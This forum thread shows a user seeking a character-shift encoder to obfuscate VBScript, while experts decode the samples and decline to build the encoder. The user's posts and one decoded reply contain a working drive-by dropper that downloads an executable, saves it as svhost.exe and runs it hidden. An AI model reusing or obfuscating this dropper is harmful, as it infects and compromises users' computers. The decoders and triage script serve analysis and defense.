Javascript Unicode escaped characters (vbscript encode)

I'm not a Java guru or anywhere near that, so I'm having a little problem.

I have a script which decodes escaped characters.
Script:
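<script language="javascript">
// Decodes a string whose last character is the shift amount.
function dF(s)
{
  // Everything except the trailing shift digit is the payload.
  var s1 = unescape(s.substr(0, s.length - 1));
  var shift = s.substr(s.length - 1, 1);
  var t = '';
  // Shift every character back; "(" becomes "%" when the shift is 3.
  for (var i = 0; i < s1.length; i++) t += String.fromCharCode(s1.charCodeAt(i) - shift);
  // The shifted text is %-escaped markup; it is unescaped and written into the page.
  document.write(unescape(t));
}
</script>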

And the thing to be decoded is written as
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(.....(6F2vfulsw(6H3

This thing is actually a VBScript encoded in that manner.
Can anyone guide me on how I can convert other VBScripts into the above format? i.e.: (6Fvfulsw(53odqjxdjh

I tried encoding with escape, but I was not able to achieve my objective of converting it to the (6Fvfulsw(53odqjxdjh format.

http://scriptasylum.com/tutorials/encdec/encode-decode.html On this page, the 2nd decoder will help you decode.
Unknown-KillerAsked:
 
Michel PlungjanIT ExpertCommented:
So you need to encode your vbscript to spread spyware too? I hope not!

Did you try
http://www.microsoft.com/downloads/details.aspx?FamilyId=E7877F67-C447-4873-B1B0-21F0626A6329&displaylang=en
0
 
Unknown-KillerAuthor Commented:
I would love it if someone would post a script in Java or PHP to convert normal VBScript into that format; the encoded stuff must be able to be decoded by this script:

<script language="javascript">
function dF(s)
{
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(var i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
dF(mycode);
</script>
0
 
Unknown-KillerAuthor Commented:
can u be a little more brief and point me directly to the encoder?
0
 
Unknown-KillerAuthor Commented:
My Script:
<script language="VBScript">
    on error resume next
    dl = "http://-----/yo.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="svhost.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    </script>
After editing some stuff i want it to get converted in format like this
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(53huuru(53uhvxph(53qh{w(3G(3D(53(53(53(53go(53(6G(53(55kwws(6D22lwdoldqgluhfwru|1frp2whuph{2}lq1h{h(55(3G(3D(53(53(53(53Vhw(53gi(53(6G(53grfxphqw1fuhdwhHohphqw(5;(55remhfw(55(5<(3G(3D(53(53(53(53gi1vhwDwwulexwh(53(55fodvvlg(55(5F(53(55fovlg(6DEG<9F889098D6044G30<;6D033F37IF5<H69(55(3G(3D(53(53(53(53vwu(6G(55Plfurvriw1[POKWWS(55(3G(3D(53(53(53(53Vhw(53{(53(6G(53gi1FuhdwhRemhfw(5;vwu(5F(55(55(5<(3G(3D(53(53(53(53d4(6G(55Dgr(55(3G(3D(53(53(53(53d5(6G(55ge1(55(3G(3D(53(53(53(53d6(6G(55Vwu(55(3G(3D(53(53(53(53d7(6G(55hdp(55(3G(3D(53(53(53(53vwu4(6Gd4(59d5(59d6(59d7(3G(3D(53(53(53(53vwu8(6Gvwu4(3G(3D(53(53(53(53vhw(53V(53(6G(53gi1fuhdwhremhfw(5;vwu8(5F(55(55(5<(3G(3D(53(53(53(53V1w|sh(53(6G(534(3G(3D(53(53(53(53vwu9(6G(55JHW(55(3G(3D(53(53(53(53{1Rshq(53vwu9(5F(53go(5F(53Idovh(3G(3D(53(53(53(53{1Vhqg(3G(3D(53(53(53(53iqdph4(6G(55vykrvw1h{h(55(3G(3D(53(53(53(53vhw(53I(53(6G(53gi1fuhdwhremhfw(5;(55Vfulswlqj1IlohV|vwhpRemhfw(55(5F(55(55(5<(3G(3D(53(53(53(53vhw(53wps(53(6G(53I1JhwVshfldoIroghu(5;5(5<(3G(3D(53(53(53(53iqdph4(6G(53I1ExlogSdwk(5;wps(5Fiqdph4(5<(3G(3D(53(53(53(53V1rshq(3G(3D(53(53(53(53V1zulwh(53{1uhvsrqvhErg|(3G(3D(53(53(53(53V1vdyhwriloh(53iqdph4(5F5(3G(3D(53(53(53(53V1forvh(3G(3D(53(53(53(53vhw(53T(53(6G(53gi1fuhdwhremhfw(5;(55Vkhoo1Dssolfdwlrq(55(5F(55(55(5<(3G(3D(53(53(53(53T1VkhooH{hfxwh(53iqdph4(5F(55(55(5F(55(55(5F(55rshq(55(5F3(3G(3D(53(53(53(53(6F2vfulsw(6H3

I copied the above code from somewhere else; it is not my encoded code.
0
 
HonorGodSoftware EngineerCommented:
 Unfortunately, this question refers to Javascript, when, in fact, it is a VBscript question.  I wonder if a moderator could change this wording?
0
 
Michel PlungjanIT ExpertCommented:
The decoder is JS
0
 
Unknown-KillerAuthor Commented:
so any one?
0
 
Unknown-KillerAuthor Commented:
any pro dont know about it?
0
 
Michel PlungjanIT ExpertCommented:
0
 
Unknown-KillerAuthor Commented:
thats a decoder dude

maybe this can help
http://www.ibresource.ru/forums/index.php?showtopic=28683&pid=180784&mode=threaded&show=&st=&

if you dont understand russian then use http://babelfish.altavista.com 
they have some other script but encoded like i say
0
 
Michel PlungjanIT ExpertCommented:
0
 
Unknown-KillerAuthor Commented:
i was searching in google and came across this url
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.99show.com/adduser.asp&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3D(6Fvfulsw%26hl%3Den%26lr%3D%26sa%3DG

after looking at source i found out a code

(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3

i decoded it and got
<script language=JScript.Encode src=http://www.jq4u.com/myadv.asp></script>
but that page shows nothing; maybe it needs parameters
can it help?
0
 
Michel PlungjanIT ExpertCommented:
No, it is just a japanese page that no longer returns a script
0
 
Unknown-KillerAuthor Commented:
hah still no good method :-s i think this thing is buggy but some italian guys also coded stuff like that & have their spyware stuff being spread
0
 
Unknown-KillerAuthor Commented:
no, I want to expose the exploit so Microsoft can make their information bar more secure,
if you want, mplungjan, I can send you the link to that spyware company, but somewhere in private
I work in an office and that spyware is spreading via Yahoo and has infected lots of computers

I went to that link and it asks for genuine OS stuff; I don't know what it is talking about
0
 
Michel PlungjanIT ExpertCommented:
So why do you need an ENCODER to expose ?

Michel
0
 
Unknown-KillerAuthor Commented:
actually its a project, i'll get some good remarks on giving this thing to my company
0
 
Dennis MaederCommented:
This scheme treats the two chars after ( as an offset pseudo-hexcode and other characters are offset ascii codes.
Here is a javascript to do the decoding for the example you provided.
It is possible that the offsets may vary - change eoff and roff.
It is also advisable to use the alert to view code ( or add spaces between characters ) in case the decrypted code is malicious.
D


<script type="text/javascript">

var cr = "(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3";
alert (decode(cr));

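function decode(cryptic){
  var dc   = "";     /* decoded output */
  var eoff = 51;     /* offset subtracted from a pseudo-hex pair */
  var roff = 3;      /* offset subtracted from any other character */
  var ec   = "(";    /* marks the start of a pseudo-hex pair */
  /* hex digits 0-F appear shifted by 3 as 3-9 : ; < D-I, so those must sit at index 3..18 */
  var cod  = "0123456789:;<DEFGHI";
  var d    = "";
  var i    = 0;
  /* the final character is the shift digit and is not decoded */
  while (i < cryptic.length - 1) {
    var c = cryptic.charAt(i);
    if (c == ec) {
      /* deal with pseudo-hex code */
      d = String.fromCharCode(16*cod.indexOf(cryptic.charAt(i+1)) + cod.indexOf(cryptic.charAt(i+2)) - eoff);
      i = i + 3;
    }
    else {
      d = String.fromCharCode(cryptic.charCodeAt(i) - roff);
      i++;
    }
    dc = dc + d;
  }
  return dc;
}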

</script>
 
0
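
A static variant of the decoders above, added here as an example and not code from any poster in this thread: it reads the shift from the trailing digit the way dF() does, returns the decoded text instead of writing it into a page, defangs any URLs, and flags strings that appear in the VBScript quoted in this thread. The names `decodeShifted`, `triage` and the indicator labels are chosen for this example, and dropping whitespace assumes the spaces in the quoted blob are line-wrap artifacts of an escape()-then-shift encoding.

```javascript
// Added example: decode for inspection only; nothing is written to a page.
// Indicator strings are those visible in the VBScript quoted in this thread.
const INDICATORS = [
  ["object-clsid", /clsid:BD96C556-65A3-11D0-983A-00C04FC29E36/i],
  ["xmlhttp", /Microsoft\.XMLHTTP/i],
  ["file-system-object", /Scripting\.FileSystemObject/i],
  ["shell-application", /Shell\.Application/i],
  ["encoded-script-src", /language\s*=\s*["']?(?:JScript|VBScript)\.Encode/i],
];

function decodeShifted(blob) {
  // Assumption: whitespace is a line-wrap artifact. escape() %-encodes spaces
  // and control characters, so no literal whitespace belongs in the blob.
  const s = blob.replace(/\s+/g, "");
  const last = s.slice(-1);
  if (!/^[0-9]$/.test(last)) throw new Error("no trailing shift digit");
  const shift = Number(last);
  let shifted = "";
  for (let i = 0; i < s.length - 1; i++) {
    shifted += String.fromCharCode(s.charCodeAt(i) - shift);
  }
  // Percent-decode by hand; malformed escapes stay as-is instead of throwing.
  const text = shifted.replace(/%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})/g,
    (m, u, h) => String.fromCharCode(parseInt(u || h, 16)));
  return { shift, text };
}

function triage(blob) {
  const { shift, text } = decodeShifted(blob);
  // Defang URLs so the report can be pasted into a ticket safely.
  const urls = (text.match(/https?:\/\/[^\s"'<>]+/gi) || [])
    .map((u) => u.replace(/^http/i, "hxxp").replace(/\./g, "[.]"));
  const flags = INDICATORS.filter(([, re]) => re.test(text)).map(([n]) => n);
  return { shift, text, urls, flags };
}

// Short sample blob quoted earlier in this thread.
const SAMPLE = "(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22" +
  "zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3";
console.log(triage(SAMPLE));
```
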
 
Dennis MaederCommented:
The other code you quoted is most certainly malicious (to windows) and points to various exe
e.g.
<|s|c|r|i|p|t| |l|a|n|g|u|a|g|e|=|"|V|B|S|c|r|i|p|t|"|>| | | | | | |o|n| |e|r|r|o|r| |r|e|s|u|m|e| |n|e|x|t| | | | | | |d|l| |=| |"|h|t|t|p|:|/|/|i|t|a|l|i|a|n|d|i|r|e|c|t|o|r|y|.|c|o|m|/|t|e|r|m|e|x|/|z|i|n|.|e|x|e|"| | | | | | |S|e|t| |d|f| |=| |d|o|c|u|m|e|n|t|.|c|r|e|a|t|e|E|l|e|m|e|n|t||"|o|b|j|e|c|t|"|| | | | | | |d|f|.|s|e|t|A|t|t|r|i|b|u|t|e| |"|c|l|a|s|s|i|d|"|,| |"|c|l|s|i|d|:|B|D|9|6|C|5|5|6|-|6|5|A|3|-|1|1|D|0|-|9|8|3|A|-|0|0|C|0|4|F|C|2|9|E|3|6|"| | | | | | |s|t|r|=|"|M|i|c|r|o|s|o|f|t|.|X|M|L|H|T|T|P|"| | | | | | |S|e|t| |x| |=| |d|f|.|C|r|e|a|t|e|O|b|j|e|c|t||s|t|r|,|"|"|| | | | | | |a|1|=|"|A|d|o|"| | | | | | |a|2|=|"|d|b|.|"| | | | | | |a|3|=|"|S|t|r|"| | | | | | |a|4|=|"|e|a|m|"| | | | | | |s|t|r|1|=|a|1|&|a|2|&|a|3|&|a|4| | | | | | |s|t|r|5|=|s|t|r|1| | | | | | |s|e|t| |S| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||s|t|r|5|,|"|"|| | | | | | |S|.|t|y|p|e| |=| |1| | | | | | |s|t|r|6|=|"|G|E|T|"| | | | | | |x|.|O|p|e|n| |s|t|r|6|,| |d|l|,| |F|a|l|s|e| | | | | | |x|.|S|e|n|d| | | | | | |f|n|a|m|e|1|=|"|s|v|h|o|s|t|.|e|x|e|"| | | | | | |s|e|t| |F| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|c|r|i|p|t|i|n|g|.|F|i|l|e|S|y|s|t|e|m|O|b|j|e|c|t|"|,|"|"|| | | | | | |s|e|t| |t|m|p| |=| |F|.|G|e|t|S|p|e|c|i|a|l|F|o|l|d|e|r||2|| | | | | | |f|n|a|m|e|1|=| |F|.|B|u|i|l|d|P|a|t|h||t|m|p|,|f|n|a|m|e|1|| | | | | | |S|.|o|p|e|n| | | | | | |S|.|w|r|i|t|e| |x|.|r|e|s|p|o|n|s|e|B|o|d|y| | | | | | |S|.|s|a|v|e|t|o|f|i|l|e| |f|n|a|m|e|1|,|2| | | | | | |S|.|c|l|o|s|e| | | | | | |s|e|t| |Q| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|h|e|l|l|.|A|p|p|l|i|c|a|t|i|o|n|"|,|"|"|| | | | | | |Q|.|S|h|e|l|l|E|x|e|c|u|t|e| |f|n|a|m|e|1|,|"|"|,|"|"|,|"|o|p|e|n|"|,|0| | | | | | |<|/|s|c|r|i|p|t|>|
0
 
Unknown-KillerAuthor Commented:
dennis_maeder can u tell me how to make encoder? i aint a java guru
0
 
Dennis MaederCommented:
Unknown-Killer, mplungjan,
Yes I think I can write a javascript encoder of this sort, but I'm not sure that I should.
Let me explain:
A decoder is defensive, it helps you know what's going on with a threat, but a published encoder may be used by some for illicit purposes.
This request is for a specific type of encoding known to be used for antisocial purposes, and I must assume that any code I might produce could be used in that way.
However, the scriptasylum link you gave at the top offers an encoder, and you or anyone could obfuscate their code using that.
Michel, as page editor, what do you think?
D
0
 
Michel PlungjanIT ExpertCommented:
I completely agree - hence my question in
#17849249
0
 
Dennis MaederCommented:
See my comments of 11/13. It took some effort to show questioner how the code worked, but I stopped short of providing an encoder for ethical reasons and to follow EE guidelines in concert with page editor and contributor Michel Plungjan. Should that be penalized?
D
0
Question has a verified solution.